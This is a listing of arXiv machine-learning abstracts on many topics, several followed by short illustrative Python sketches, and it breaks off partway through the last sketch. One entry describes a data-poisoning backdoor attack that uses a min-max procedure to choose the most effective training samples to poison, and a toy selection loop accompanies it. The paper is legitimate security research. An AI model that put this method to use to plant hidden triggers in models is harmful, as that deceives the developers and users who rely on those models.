    In this paper, numerical methods using Physics-Informed Neural Networks (PINNs) are presented with the aim of solving higher-order ordinary differential equations (ODEs). Indeed, this deep-learning technique is successfully applied to solving different classes of singular ODEs, namely the well-known second-order Lane-Emden equations, third-order Emden-Fowler equations, and fourth-order Lane-Emden-Fowler equations. Two variants of the PINN technique are considered and compared. First, a minimization procedure is used to constrain the total loss function of the neural network, in which the equation residual is considered with some weight to form a physics-based loss and added to the training data loss that contains the initial/boundary conditions. Second, a specific choice of trial solutions ensuring these conditions as hard constraints is made in order to satisfy the differential equation, contrary to the first variant based on training data where the constraints appear as soft ones. Advantages and drawbacks of the PINN variants are highlighted.
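The hard-constraint variant can be illustrated with the standard second-order Lane-Emden initial conditions y(0)=1, y'(0)=0 (a sketch only: the ansatz below is a common choice in the PINN literature, `net` is a plain stand-in function rather than a trained network, and the names are ours):

```python
def trial_solution(net, x, y0=1.0):
    """Hard-constraint ansatz for a second-order IVP with y(0)=y0, y'(0)=0.

    y(x) = y0 + x**2 * net(x) satisfies both initial conditions for ANY net,
    so the PINN loss needs only the equation residual, with no boundary term.
    """
    return y0 + x**2 * net(x)

# Any "network" output leaves the initial conditions exactly satisfied.
net = lambda x: 3.0 * x + 2.0   # arbitrary stand-in for a neural network
h = 1e-6
y = trial_solution(net, 0.0)
dy = (trial_solution(net, h) - trial_solution(net, -h)) / (2 * h)
assert y == 1.0                 # y(0) = 1 exactly
assert abs(dy) < 1e-5           # y'(0) = 0 up to finite-difference error
```

In the soft-constraint variant, by contrast, the network output is used directly and the same two conditions appear as extra penalty terms in the loss, which are only satisfied approximately after training.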
    Mitigating Adversarial Vulnerability through Causal Parameter Estimation by Adversarial Double Machine Learning. (arXiv:2307.07250v1 [cs.LG])
    Adversarial examples derived from deliberately crafted perturbations on visual inputs can easily harm the decision process of deep neural networks. To prevent potential threats, various adversarial training-based defense methods have grown rapidly and become a de facto standard approach for robustness. Despite recent competitive achievements, we observe that adversarial vulnerability varies across targets and certain vulnerabilities remain prevalent. Intriguingly, such a peculiar phenomenon cannot be relieved even with deeper architectures and advanced defense methods. To address this issue, in this paper, we introduce a causal approach called Adversarial Double Machine Learning (ADML), which allows us to quantify the degree of adversarial vulnerability for network predictions and capture the effect of treatments on outcomes of interest. ADML can directly estimate the causal parameter of adversarial perturbations per se and mitigate negative effects that can potentially damage robustness, bringing a causal perspective to adversarial vulnerability. Through extensive experiments on various CNN and Transformer architectures, we corroborate that ADML improves adversarial robustness by large margins and relieves the vulnerabilities observed empirically.
    Inverse Evolution Layers: Physics-informed Regularizers for Deep Neural Networks. (arXiv:2307.07344v1 [cs.LG])
    This paper proposes a novel approach to integrating partial differential equation (PDE)-based evolution models into neural networks through a new type of regularization. Specifically, we propose inverse evolution layers (IELs) based on evolution equations. These layers can achieve specific regularization objectives and endow neural networks' outputs with corresponding properties of the evolution models. Moreover, IELs are straightforward to construct and implement, and can be easily designed for various physical evolutions and neural networks. Additionally, the design process for these layers can provide neural networks with intuitive and mathematical interpretability, thus enhancing the transparency and explainability of the approach. To demonstrate the effectiveness, efficiency, and simplicity of our approach, we present an example of endowing semantic segmentation models with the smoothness property based on the heat diffusion model. To achieve this goal, we design heat-diffusion IELs and apply them to address the challenge of semantic segmentation with noisy labels. The experimental results demonstrate that the heat-diffusion IELs can effectively mitigate the overfitting problem caused by noisy labels.
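The heat-diffusion building block behind the smoothness-endowing IELs can be sketched as one explicit step of the 2D heat equation (this is only the forward-diffusion primitive, not the full inverse evolution layer construction; names and boundary handling are our assumptions):

```python
import numpy as np

def heat_step(u, dt=0.2):
    """One explicit step of u_t = Laplacian(u) with a 5-point stencil.

    Repeated application smooths the field, the property the paper's
    heat-diffusion IELs impose on segmentation outputs. Periodic boundaries
    via np.roll keep the sketch short.
    """
    lap = (np.roll(u, 1, 0) + np.roll(u, -1, 0)
           + np.roll(u, 1, 1) + np.roll(u, -1, 1) - 4 * u)
    return u + dt * lap

u = np.zeros((8, 8))
u[4, 4] = 1.0                       # isolated spike, e.g. a noisy label
for _ in range(5):
    u = heat_step(u)
assert abs(u.sum() - 1.0) < 1e-9    # diffusion conserves total mass
assert u.max() < 1.0                # the spike has been smoothed out
```

A label map dominated by such smooth structure is exactly what the heat-diffusion IELs reward, which is why they help against the high-frequency artifacts of noisy labels.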
    Knowledge Boosting: Rethinking Medical Contrastive Vision-Language Pre-Training. (arXiv:2307.07246v1 [cs.CV])
    The foundation models based on pre-training technology have significantly advanced artificial intelligence from theoretical to practical applications. These models have facilitated the feasibility of computer-aided diagnosis for widespread use. Medical contrastive vision-language pre-training, which does not require human annotations, is an effective approach for guiding representation learning using description information in diagnostic reports. However, the effectiveness of pre-training is limited by large-scale semantic overlap and shifting problems in the medical field. To address these issues, we propose the Knowledge-Boosting Contrastive Vision-Language Pre-training framework (KoBo), which integrates clinical knowledge into the learning of vision-language semantic consistency. The framework uses an unbiased, open-set sample-wise knowledge representation to measure negative sample noise and supplement the correspondence between vision-language mutual information and clinical knowledge. Extensive experiments validate the effect of our framework on eight tasks including classification, segmentation, retrieval, and semantic relatedness, achieving comparable or better performance under zero-shot or few-shot settings. Our code is available at https://github.com/ChenXiaoFei-CS/KoBo.
    Visualizing Overlapping Biclusterings and Boolean Matrix Factorizations. (arXiv:2307.07396v1 [cs.LG])
    Finding (bi-)clusters in bipartite graphs is a popular data analysis approach. Analysts typically want to visualize the clusters, which is simple as long as the clusters are disjoint. However, many modern algorithms find overlapping clusters, making visualization more complicated. In this paper, we study the problem of visualizing \emph{a given clustering} of overlapping clusters in bipartite graphs and the related problem of visualizing Boolean Matrix Factorizations. We conceptualize three different objectives that any good visualization should satisfy: (1) proximity of cluster elements, (2) large consecutive areas of elements from the same cluster, and (3) large uninterrupted areas in the visualization, regardless of the cluster membership. We provide objective functions that capture these goals and algorithms that optimize these objective functions. Interestingly, in experiments on real-world datasets, we find that the best trade-off between these competing goals is achieved by a novel heuristic, which locally aims to place rows and columns with similar cluster membership next to each other.
    3D Shape-Based Myocardial Infarction Prediction Using Point Cloud Classification Networks. (arXiv:2307.07298v1 [cs.CV])
    Myocardial infarction (MI) is one of the most prevalent cardiovascular diseases with associated clinical decision-making typically based on single-valued imaging biomarkers. However, such metrics only approximate the complex 3D structure and physiology of the heart and hence hinder a better understanding and prediction of MI outcomes. In this work, we investigate the utility of complete 3D cardiac shapes in the form of point clouds for an improved detection of MI events. To this end, we propose a fully automatic multi-step pipeline consisting of a 3D cardiac surface reconstruction step followed by a point cloud classification network. Our method utilizes recent advances in geometric deep learning on point clouds to enable direct and efficient multi-scale learning on high-resolution surface models of the cardiac anatomy. We evaluate our approach on 1068 UK Biobank subjects for the tasks of prevalent MI detection and incident MI prediction and find improvements of ~13% and ~5% respectively over clinical benchmarks. Furthermore, we analyze the role of each ventricle and cardiac phase for 3D shape-based MI detection and conduct a visual analysis of the morphological and physiological patterns typically associated with MI outcomes.
    How Different Is Stereotypical Bias Across Languages?. (arXiv:2307.07331v1 [cs.CL])
    Recent studies have demonstrated how to assess the stereotypical bias in pre-trained English language models. In this work, we extend this branch of research in multiple different dimensions by systematically investigating (a) mono- and multilingual models of (b) different underlying architectures with respect to their bias in (c) multiple different languages. To that end, we make use of the English StereoSet data set (Nadeem et al., 2021), which we semi-automatically translate into German, French, Spanish, and Turkish. We find that it is of major importance to conduct this type of analysis in a multilingual setting, as our experiments show a much more nuanced picture as well as notable differences from the English-only analysis. The main takeaways from our analysis are that mGPT-2 (partly) shows surprising anti-stereotypical behavior across languages, English (monolingual) models exhibit the strongest bias, and the stereotypes reflected in the data set are least present in Turkish models. Finally, we release our codebase alongside the translated data sets and practical guidelines for the semi-automatic translation to encourage a further extension of our work to other languages.
    Reward-Directed Conditional Diffusion: Provable Distribution Estimation and Reward Improvement. (arXiv:2307.07055v1 [cs.LG])
    We explore the methodology and theory of reward-directed generation via conditional diffusion models. Directed generation aims to generate samples with desired properties as measured by a reward function, which has broad applications in generative AI, reinforcement learning, and computational biology. We consider the common learning scenario where the data set consists of unlabeled data along with a smaller set of data with noisy reward labels. Our approach leverages a learned reward function on the smaller data set as a pseudolabeler. From a theoretical standpoint, we show that this directed generator can effectively learn and sample from the reward-conditioned data distribution. Additionally, our model is capable of recovering the latent subspace representation of data. Moreover, we establish that the model generates a new population that moves closer to a user-specified target reward value, where the optimality gap aligns with the off-policy bandit regret in the feature subspace. The improvement in rewards obtained is influenced by the interplay between the strength of the reward signal, the distribution shift, and the cost of off-support extrapolation. We provide empirical results to validate our theory and highlight the relationship between the strength of extrapolation and the quality of generated samples.
    Graph Positional and Structural Encoder. (arXiv:2307.07107v1 [cs.LG])
    Positional and structural encodings (PSE) enable better identifiability of nodes within a graph, as in general graphs lack a canonical node ordering. This renders PSEs essential tools for empowering modern GNNs, and in particular graph Transformers. However, designing PSEs that work optimally for a variety of graph prediction tasks is a challenging and unsolved problem. Here, we present the graph positional and structural encoder (GPSE), a first-ever attempt to train a graph encoder that captures rich PSE representations for augmenting any GNN. GPSE can effectively learn a common latent representation for multiple PSEs, and is highly transferable. The encoder trained on a particular graph dataset can be used effectively on datasets drawn from significantly different distributions and even modalities. We show that across a wide range of benchmarks, GPSE-enhanced models can significantly improve the performance in certain tasks, while performing on par with those that employ explicitly computed PSEs in other cases. Our results pave the way for the development of large pre-trained models for extracting graph positional and structural information and highlight their potential as a viable alternative to explicitly computed PSEs as well as to existing self-supervised pre-training approaches.
    Performance of $\ell_1$ Regularization for Sparse Convex Optimization. (arXiv:2307.07405v1 [cs.LG])
    Despite widespread adoption in practice, guarantees for the LASSO and Group LASSO are strikingly lacking in settings beyond statistical problems, and these algorithms are usually considered to be a heuristic in the context of sparse convex optimization on deterministic inputs. We give the first recovery guarantees for the Group LASSO for sparse convex optimization with vector-valued features. We show that if a sufficiently large Group LASSO regularization is applied when minimizing a strictly convex function $l$, then the minimizer is a sparse vector supported on vector-valued features with the largest $\ell_2$ norm of the gradient. Thus, repeating this procedure selects the same set of features as the Orthogonal Matching Pursuit algorithm, which admits recovery guarantees for any function $l$ with restricted strong convexity and smoothness via weak submodularity arguments. This answers open questions of Tibshirani et al. and Yasuda et al. Our result is the first to theoretically explain the empirical success of the Group LASSO for convex functions under general input instances assuming only restricted strong convexity and smoothness. Our result also generalizes provable guarantees for the Sequential Attention algorithm, which is a feature selection algorithm inspired by the attention mechanism proposed by Yasuda et al. As an application of our result, we give new results for the column subset selection problem, which is well-studied when the loss is the Frobenius norm or other entrywise matrix losses. We give the first result for general loss functions for this problem that requires only restricted strong convexity and smoothness.
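The group-selection rule the result hinges on can be written in a few lines (a generic sketch: the paper shows that a large enough Group LASSO penalty makes the minimizer's support land on this group, matching one Orthogonal Matching Pursuit step; names are ours):

```python
import numpy as np

def select_next_group(grad, groups):
    """Pick the feature group whose gradient block has the largest l2 norm.

    `grad` is the gradient of the loss at the current (sparse) iterate and
    `groups` is a partition of the coordinates into feature groups.
    """
    norms = [np.linalg.norm(grad[g]) for g in groups]
    return int(np.argmax(norms))

grad = np.array([0.1, 0.2, 3.0, 4.0, 0.5])
groups = [[0, 1], [2, 3], [4]]               # partition of the 5 coordinates
assert select_next_group(grad, groups) == 1  # group [2,3] has norm 5.0
```

Repeating this selection, re-fitting on the chosen groups, and recomputing the gradient yields the OMP-style procedure whose recovery guarantees the abstract invokes under restricted strong convexity and smoothness.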
    Expressive Monotonic Neural Networks. (arXiv:2307.07512v1 [cs.LG])
    The monotonic dependence of the outputs of a neural network on some of its inputs is a crucial inductive bias in many scenarios where domain knowledge dictates such behavior. This is especially important for interpretability and fairness considerations. In a broader context, scenarios in which monotonicity is important can be found in finance, medicine, physics, and other disciplines. It is thus desirable to build neural network architectures that provably implement this inductive bias. In this work, we propose a weight-constrained architecture with a single residual connection to achieve exact monotonic dependence on any subset of the inputs. The weight constraint scheme directly controls the Lipschitz constant of the neural network and thus provides the additional benefit of robustness. Compared to existing techniques used for monotonicity, our method is simpler in implementation and in its theoretical foundations, has negligible computational overhead, is guaranteed to produce monotonic dependence, and is highly expressive. We show how the algorithm is used to train powerful, robust, and interpretable discriminators that achieve competitive performance compared to current state-of-the-art methods across various benchmarks, from social applications to the classification of the decays of subatomic particles produced at the CERN Large Hadron Collider.
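The core mechanism, a Lipschitz-bounded network plus a residual connection, can be sketched in one dimension (a toy version only: the paper's weight-constraint scheme is more general, and the rescaling trick and all names here are our assumptions):

```python
import numpy as np

def monotone_net(x, W1, b1, w2, lam=1.0):
    """f(x) = lam*x + g(x), with g rescaled to be at most lam-Lipschitz.

    Since tanh is 1-Lipschitz, |g'(x)| <= scale * sum|w2_i * W1_i|; choosing
    scale so this bound equals lam gives f'(x) = lam + g'(x) >= 0, i.e. f is
    monotone non-decreasing for ANY weights, by construction.
    """
    scale = lam / max(1e-12, np.abs(w2 * W1).sum())
    g = scale * np.dot(w2, np.tanh(W1 * x + b1))
    return lam * x + g

rng = np.random.default_rng(0)
W1, b1, w2 = rng.normal(size=8), rng.normal(size=8), rng.normal(size=8)
xs = np.linspace(-3.0, 3.0, 200)
ys = np.array([monotone_net(x, W1, b1, w2) for x in xs])
# Non-decreasing everywhere (up to floating-point rounding), even though the
# weights are completely unconstrained random draws.
assert np.all(np.diff(ys) >= -1e-9)
```

Because monotonicity holds for any weights, ordinary unconstrained gradient training preserves the guarantee, which is the practical appeal of this family of architectures.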
    Machine Learning-Assisted Pattern Recognition Algorithms for Estimating Ultimate Tensile Strength in Fused Deposition Modeled Polylactic Acid Specimens. (arXiv:2307.06970v1 [cs.LG])
    In this study, we investigate the application of supervised machine learning algorithms for estimating the Ultimate Tensile Strength (UTS) of Polylactic Acid (PLA) specimens fabricated using the Fused Deposition Modeling (FDM) process. A total of 31 PLA specimens were prepared, with Infill Percentage, Layer Height, Print Speed, and Extrusion Temperature serving as input parameters. The primary objective was to assess the accuracy and effectiveness of four distinct supervised classification algorithms, namely Logistic Classification, Gradient Boosting Classification, Decision Tree, and K-Nearest Neighbor, in predicting the UTS of the specimens. The results revealed that while the Decision Tree and K-Nearest Neighbor algorithms both achieved an F1 score of 0.71, the KNN algorithm exhibited a higher Area Under the Curve (AUC) score of 0.79, outperforming the other algorithms. This demonstrates the superior ability of the KNN algorithm in differentiating between the two classes of ultimate tensile strength within the dataset, rendering it the most favorable choice for classification in the context of this research. This study represents the first attempt to estimate the UTS of PLA specimens using machine learning-based classification algorithms, and the findings offer valuable insights into the potential of these techniques in improving the performance and accuracy of predictive models in the domain of additive manufacturing.
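The winning KNN classifier can be sketched generically (a plain-stdlib illustration, not the study's exact pipeline; the toy parameter values and class labels below are invented for the example):

```python
from collections import Counter
import math

def knn_predict(train_X, train_y, x, k=3):
    """Classify a print-parameter vector by majority vote of its k nearest
    training specimens under Euclidean distance."""
    dists = sorted((math.dist(x, xi), yi) for xi, yi in zip(train_X, train_y))
    votes = Counter(y for _, y in dists[:k])
    return votes.most_common(1)[0][0]

# Toy rows: (infill %, layer height mm, print speed, temperature) -> UTS class.
X = [(80, 0.1, 40, 210), (90, 0.1, 40, 215),
     (20, 0.3, 80, 190), (30, 0.3, 80, 195)]
y = ["high", "high", "low", "low"]
assert knn_predict(X, y, (85, 0.1, 45, 212)) == "high"
assert knn_predict(X, y, (25, 0.3, 75, 192)) == "low"
```

In practice the features should be normalized before computing distances, since the raw print parameters live on very different scales; that step is omitted here for brevity.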
    On Interpolating Experts and Multi-Armed Bandits. (arXiv:2307.07264v1 [cs.LG])
    Learning with expert advice and multi-armed bandit are two classic online decision problems which differ on how the information is observed in each round of the game. We study a family of problems interpolating the two. For a vector $\mathbf{m}=(m_1,\dots,m_K)\in \mathbb{N}^K$, an instance of $\mathbf{m}$-MAB indicates that the arms are partitioned into $K$ groups and the $i$-th group contains $m_i$ arms. Once an arm is pulled, the losses of all arms in the same group are observed. We prove tight minimax regret bounds for $\mathbf{m}$-MAB and design an optimal PAC algorithm for its pure exploration version, $\mathbf{m}$-BAI, where the goal is to identify the arm with minimum loss with as few rounds as possible. We show that the minimax regret of $\mathbf{m}$-MAB is $\Theta\left(\sqrt{T\sum_{k=1}^K\log (m_k+1)}\right)$ and the minimum number of pulls for an $(\epsilon,0.05)$-PAC algorithm of $\mathbf{m}$-BAI is $\Theta\left(\frac{1}{\epsilon^2}\cdot \sum_{k=1}^K\log (m_k+1)\right)$. Both our upper bounds and lower bounds for $\mathbf{m}$-MAB can be extended to a more general setting, namely the bandit with graph feedback, in terms of the clique cover and related graph parameters. As consequences, we obtained tight minimax regret bounds for several families of feedback graphs.
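The stated minimax regret rate makes the interpolation concrete: with one group of K arms ($\mathbf{m}$-MAB reduces to experts) the rate is $\sqrt{T\log K}$-like, while with K singleton groups (standard bandit) it grows with K. A sketch evaluating the $\Theta(\cdot)$ expression (constants suppressed; names are ours):

```python
import math

def mmab_regret_rate(T, group_sizes):
    """Evaluate sqrt(T * sum_k log(m_k + 1)), the minimax regret rate for
    m-MAB from the abstract, up to constant factors."""
    return math.sqrt(T * sum(math.log(m + 1) for m in group_sizes))

# Full feedback (one group of K arms) vs full bandit (K singleton groups):
K, T = 16, 10_000
experts = mmab_regret_rate(T, [K])       # ~ sqrt(T log(K+1)): experts regime
bandit = mmab_regret_rate(T, [1] * K)    # ~ sqrt(T K log 2): bandit regime
assert experts < bandit                  # more feedback, lower regret rate
```

Intermediate partitions of the K arms give rates strictly between the two extremes, which is exactly the interpolation the problem family is designed to capture.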
    Pathway toward prior knowledge-integrated machine learning in engineering. (arXiv:2307.06950v1 [cs.AI])
    Despite the digitalization trend and data volume surge, first-principles models (also known as logic-driven, physics-based, rule-based, or knowledge-based models) and data-driven approaches have existed in parallel, mirroring the ongoing AI debate on symbolism versus connectionism. Research on process development that integrates both sides to transfer and utilize domain knowledge in the data-driven process is rare. This study highlights efforts and prevailing trends to integrate multidisciplinary domain expertise into machine-acknowledgeable, data-driven processes in a two-fold organization: examining sources of information uncertainty in knowledge representation and exploring knowledge decomposition with a three-tier knowledge-integrated machine learning paradigm. This approach balances holist and reductionist perspectives in the engineering domain.
    AI For Global Climate Cooperation 2023 Competition Proceedings. (arXiv:2307.06951v1 [cs.AI])
The international community must collaborate to mitigate climate change and sustain economic growth. However, collaboration is hard to achieve, partly because no global authority can ensure compliance with international climate agreements. Combining AI with climate-economic simulations offers a promising solution to design international frameworks, including negotiation protocols and climate agreements, that promote and incentivize collaboration. In addition, these frameworks should also support the fulfillment of policy goals and sustained commitment, taking into account climate-economic dynamics and strategic behaviors. These challenges require an interdisciplinary approach across machine learning, economics, climate science, law, policy, ethics, and other fields. Towards this objective, we organized AI for Global Climate Cooperation, a Mila competition in which teams submitted proposals and analyses of international frameworks, based on (modifications of) RICE-N, an AI-driven integrated assessment model (IAM). In particular, RICE-N supports modeling regional decision-making using AI agents. Furthermore, the IAM then models the climate-economic impact of those decisions into the future. Whereas the first track focused only on performance metrics, the proposals submitted to the second track were evaluated both quantitatively and qualitatively. The quantitative evaluation focused on a combination of (i) the degree of mitigation of global temperature rise and (ii) the increase in economic productivity. In addition, an interdisciplinary panel of human experts in law, policy, sociology, economics and environmental science evaluated the solutions qualitatively. In particular, the panel considered the effectiveness, simplicity, feasibility, ethics, and notions of climate justice of the protocols. In the third track, the participants were asked to critique and improve RICE-N.
    Learning Sparse Neural Networks with Identity Layers. (arXiv:2307.07389v1 [cs.LG])
The sparsity of deep neural networks is well studied as a way to maximize performance while reducing the size of overparameterized networks. Existing methods focus on pruning parameters during training using thresholds and metrics. Feature similarity between different layers, however, has received little attention, even though, as we rigorously show in this paper, it is highly correlated with network sparsity. Motivated by interlayer feature similarity in overparameterized models, we investigate the intrinsic link between network sparsity and interlayer feature similarity. Specifically, using information bottleneck theory, we prove that reducing interlayer feature similarity, measured via Centered Kernel Alignment (CKA), improves the sparsity of the network. Applying this theory, we propose a plug-and-play CKA-based Sparsity Regularization for sparse network training, dubbed CKA-SR, which uses CKA to reduce feature similarity between layers and increase network sparsity. In other words, layers of our sparse network tend to have their own identity. Experimentally, we plug the proposed CKA-SR into the training process of sparse network training methods and find that it consistently improves the performance of several state-of-the-art sparse training methods, especially at extremely high sparsity. Code is included in the supplementary materials.
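As a rough illustration of the quantity being regularized, linear CKA between two layers' feature matrices can be computed as follows (a minimal sketch of standard linear CKA, not the paper's training code; the way CKA-SR batches features and weights the penalty is not specified here and is left out):

```python
import numpy as np

def linear_cka(X, Y):
    """Linear CKA between feature matrices X (n x p1) and Y (n x p2),
    where n is the number of examples. Returns a value in [0, 1]."""
    X = X - X.mean(axis=0)          # center each feature dimension
    Y = Y - Y.mean(axis=0)
    # ||Y^T X||_F^2 / (||X^T X||_F * ||Y^T Y||_F)
    num = np.linalg.norm(Y.T @ X) ** 2
    den = np.linalg.norm(X.T @ X) * np.linalg.norm(Y.T @ Y)
    return num / den

# A CKA-SR-style penalty would sum linear_cka(F_i, F_j) over pairs of
# layer feature matrices F_i, F_j and add it (scaled) to the loss.
```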
    AIC-AB NET: A Neural Network for Image Captioning with Spatial Attention and Text Attributes. (arXiv:2307.07370v1 [cs.CV])
Image captioning is a significant field spanning computer vision and natural language processing. We propose and present AIC-AB NET, a novel Attribute-Information-Combined Attention-Based Network that combines a spatial attention architecture and text attributes in an encoder-decoder framework. For caption generation, adaptive spatial attention determines which image region best represents the image and whether to attend to the visual features or the visual sentinel. Text attribute information is synchronously fed into the decoder to help image recognition and reduce uncertainty. We have tested and evaluated our AIC-AB NET on the MS COCO dataset and a newly proposed Fashion dataset. The Fashion dataset is employed as a benchmark of single-object images. The results show the superior performance of the proposed model compared to the state-of-the-art baseline and ablated models on both the images from MS COCO and our single-object images. Our AIC-AB NET outperforms the baseline adaptive attention network by 0.017 (CIDEr score) on the MS COCO dataset and 0.095 (CIDEr score) on the Fashion dataset.
    Higher-order topological kernels via quantum computation. (arXiv:2307.07383v1 [quant-ph])
Topological data analysis (TDA) has emerged as a powerful tool for extracting meaningful insights from complex data. TDA enhances the analysis of objects by embedding them into a simplicial complex and extracting useful global properties such as the Betti numbers, i.e. the number of multidimensional holes, which can be used to define kernel methods that are easily integrated with existing machine-learning algorithms. These kernel methods have found broad applications, as they rely on powerful mathematical frameworks which provide theoretical guarantees on their performance. However, the computation of higher-dimensional Betti numbers can be prohibitively expensive on classical hardware, while quantum algorithms can approximate them in polynomial time in the instance size. In this work, we propose a quantum approach to defining topological kernels, which is based on constructing Betti curves, i.e. topological fingerprints of filtrations of increasing order. We exhibit a working prototype of our approach implemented on a noiseless simulator and show its robustness by means of some empirical results suggesting that topological approaches may offer an advantage in quantum machine learning.
    LINFA: a Python library for variational inference with normalizing flow and annealing. (arXiv:2307.04675v2 [cs.LG] UPDATED)
    Variational inference is an increasingly popular method in statistics and machine learning for approximating probability distributions. We developed LINFA (Library for Inference with Normalizing Flow and Annealing), a Python library for variational inference to accommodate computationally expensive models and difficult-to-sample distributions with dependent parameters. We discuss the theoretical background, capabilities, and performance of LINFA in various benchmarks. LINFA is publicly available on GitHub at https://github.com/desResLab/LINFA.
    MGit: A Model Versioning and Management System. (arXiv:2307.07507v1 [cs.LG])
    Models derived from other models are extremely common in machine learning (ML) today. For example, transfer learning is used to create task-specific models from "pre-trained" models through finetuning. This has led to an ecosystem where models are related to each other, sharing structure and often even parameter values. However, it is hard to manage these model derivatives: the storage overhead of storing all derived models quickly becomes onerous, prompting users to get rid of intermediate models that might be useful for further analysis. Additionally, undesired behaviors in models are hard to track down (e.g., is a bug inherited from an upstream model?). In this paper, we propose a model versioning and management system called MGit that makes it easier to store, test, update, and collaborate on model derivatives. MGit introduces a lineage graph that records provenance and versioning information between models, optimizations to efficiently store model parameters, as well as abstractions over this lineage graph that facilitate relevant testing, updating and collaboration functionality. MGit is able to reduce the lineage graph's storage footprint by up to 7x and automatically update downstream models in response to updates to upstream models.
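A lineage graph of this kind can be pictured as a DAG in which each derived model stores only a delta against its parent's parameters instead of a full copy; the sketch below is a hypothetical illustration of that idea and does not reflect MGit's actual interface or storage format:

```python
import numpy as np

class LineageGraph:
    """Toy model-versioning store: each node keeps a sparse delta
    against its parent instead of a full parameter copy."""
    def __init__(self):
        self.parent, self.delta, self.base = {}, {}, {}

    def add_root(self, name, params):
        self.base[name] = params.copy()

    def add_child(self, name, parent, params):
        self.parent[name] = parent
        # store only the (index -> value) entries that changed
        diff = params - self.materialize(parent)
        idx = np.nonzero(diff)[0]
        self.delta[name] = (idx, diff[idx])

    def materialize(self, name):
        """Reconstruct full parameters by replaying deltas from the root."""
        if name in self.base:
            return self.base[name].copy()
        params = self.materialize(self.parent[name])
        idx, vals = self.delta[name]
        params[idx] += vals
        return params
```

Fine-tuned derivatives that change few parameters compress well under such a scheme, which is the intuition behind the storage savings reported for MGit.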
    Signed iterative random forests to identify enhancer-associated transcription factor binding. (arXiv:1810.07287v2 [stat.ML] UPDATED)
    Standard ChIP-seq peak calling pipelines seek to differentiate biochemically reproducible signals of individual genomic elements from background noise. However, reproducibility alone does not imply functional regulation (e.g., enhancer activation, alternative splicing). Here we present a general-purpose, interpretable machine learning method: signed iterative random forests (siRF), which we use to infer regulatory interactions among transcription factors and functional binding signatures surrounding enhancer elements in Drosophila melanogaster.
    HuCurl: Human-induced Curriculum Discovery. (arXiv:2307.07412v1 [cs.LG])
We introduce the problem of curriculum discovery and describe a curriculum learning framework capable of discovering effective curricula in a curriculum space based on prior knowledge about sample difficulty. Using annotation entropy and loss as measures of difficulty, we show that (i) the top-performing discovered curricula for a given model and dataset are often non-monotonic, as opposed to the monotonic curricula in existing literature, (ii) the prevailing easy-to-hard or hard-to-easy transition curricula are often at risk of underperforming, and (iii) the curricula discovered for smaller datasets and models perform well on larger datasets and models respectively. The proposed framework encompasses some of the existing curriculum learning approaches and can discover curricula that outperform them across several NLP tasks.
    Boosting Backdoor Attack with A Learnable Poisoning Sample Selection Strategy. (arXiv:2307.07328v1 [cs.CR])
Data-poisoning backdoor attacks aim to insert a backdoor into a model by manipulating the training dataset, without controlling the training process of the target model. Existing attack methods mainly focus on designing triggers or fusion strategies between triggers and benign samples. However, they often select the samples to be poisoned at random, disregarding the varying importance of each poisoning sample to backdoor injection. A recent selection strategy filters a fixed-size poisoning sample pool by recording forgetting events, but it fails to consider the remaining samples outside the pool from a global perspective. Moreover, computing forgetting events requires significant additional computing resources. Therefore, how to efficiently and effectively select poisoning samples from the entire dataset is an urgent problem in backdoor attacks. To address it, we first introduce a poisoning mask into the regular backdoor training loss. We suppose that a backdoored model trained with hard poisoning samples has a stronger backdoor effect on easy ones, which can be implemented by hindering the normal training process (i.e., maximizing the loss w.r.t. the mask). To further integrate this with the normal training process, we then propose a learnable poisoning sample selection strategy that learns the mask together with the model parameters through a min-max optimization. Specifically, the outer loop aims to achieve the backdoor attack goal by minimizing the loss based on the selected samples, while the inner loop selects hard poisoning samples that impede this goal by maximizing the loss. After several rounds of adversarial training, we finally select effective poisoning samples with high contribution. Extensive experiments on benchmark datasets demonstrate the effectiveness and efficiency of our approach in boosting backdoor attack performance.
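On a toy problem, the alternating min-max scheme described above can be sketched as follows (an illustrative stand-in with a scalar model and a hard-sample top-k mask, not the paper's actual training procedure or loss):

```python
def poison_select(targets, k, steps=200, lr=0.1):
    """Toy min-max loop: theta minimizes the loss on the k currently
    selected (hardest) samples; the selection maximizes the loss."""
    theta = 0.0
    selected = []
    for _ in range(steps):
        # inner max: the mask selects the k samples with largest loss
        losses = [(theta - t) ** 2 for t in targets]
        selected = sorted(range(len(targets)),
                          key=lambda i: -losses[i])[:k]
        # outer min: gradient step on the mean loss over selected samples
        grad = sum(2.0 * (theta - targets[i]) for i in selected) / k
        theta -= lr * grad
    return theta, sorted(selected)
```

After a few rounds the selection stabilizes on the samples the model finds hardest to fit, mirroring the "high-contribution" poisoning samples the method keeps.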
    Defect Classification in Additive Manufacturing Using CNN-Based Vision Processing. (arXiv:2307.07378v1 [cs.CV])
The development of computer vision and in-situ monitoring using visual sensors allows the collection of large datasets from the additive manufacturing (AM) process. Such datasets can be used with machine learning techniques to improve the quality of AM. This paper examines two scenarios: first, using convolutional neural networks (CNNs) to accurately classify defects in an image dataset from AM, and second, applying active learning techniques to the developed classification model. The latter allows the construction of a human-in-the-loop mechanism that reduces the amount of labeled data required for training and assists in generating the training data.
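The active-learning loop typically queries the examples the current classifier is least certain about; a minimal uncertainty-sampling selector (an illustrative assumption for the querying criterion, since the abstract does not fix one) might look like:

```python
import math

def entropy(probs):
    """Shannon entropy of a predicted class distribution."""
    return -sum(p * math.log(p) for p in probs if p > 0)

def select_for_labeling(predictions, budget):
    """Pick the `budget` unlabeled images whose predicted class
    distributions have the highest entropy (most uncertain)."""
    ranked = sorted(range(len(predictions)),
                    key=lambda i: -entropy(predictions[i]))
    return ranked[:budget]
```

The returned indices are the images shown to a human annotator, closing the human-in-the-loop and shrinking the labeled set needed for training.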
    Controllable Emphasis with zero data for text-to-speech. (arXiv:2307.07062v1 [eess.AS])
We present a scalable method to produce high-quality emphasis for text-to-speech (TTS) that does not require recordings or annotations. Many TTS models include a phoneme duration model. A simple but effective method to achieve emphasized speech consists of increasing the predicted duration of the emphasized word. We show that this is significantly better than spectrogram modification techniques, improving naturalness by $7.3\%$ and testers' correct identification of the emphasized word in a sentence by $40\%$ on a reference female en-US voice. We show that this technique significantly closes the gap to methods that require explicit recordings. The method proved to be scalable and preferred in all four languages tested (English, Spanish, Italian, German), for different voices and multiple speaking styles.
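The duration-based emphasis described above amounts to stretching the predicted phoneme durations of the target word before vocoding; a minimal sketch (the 1.25 scale factor and frame-based representation are illustrative assumptions, not the paper's tuned values):

```python
def emphasize(durations, word_spans, word_idx, scale=1.25):
    """Lengthen the predicted phoneme durations (in frames) of one word.

    durations:  per-phoneme durations for the whole utterance
    word_spans: (start, end) phoneme index ranges, one per word
    word_idx:   which word to emphasize
    """
    start, end = word_spans[word_idx]
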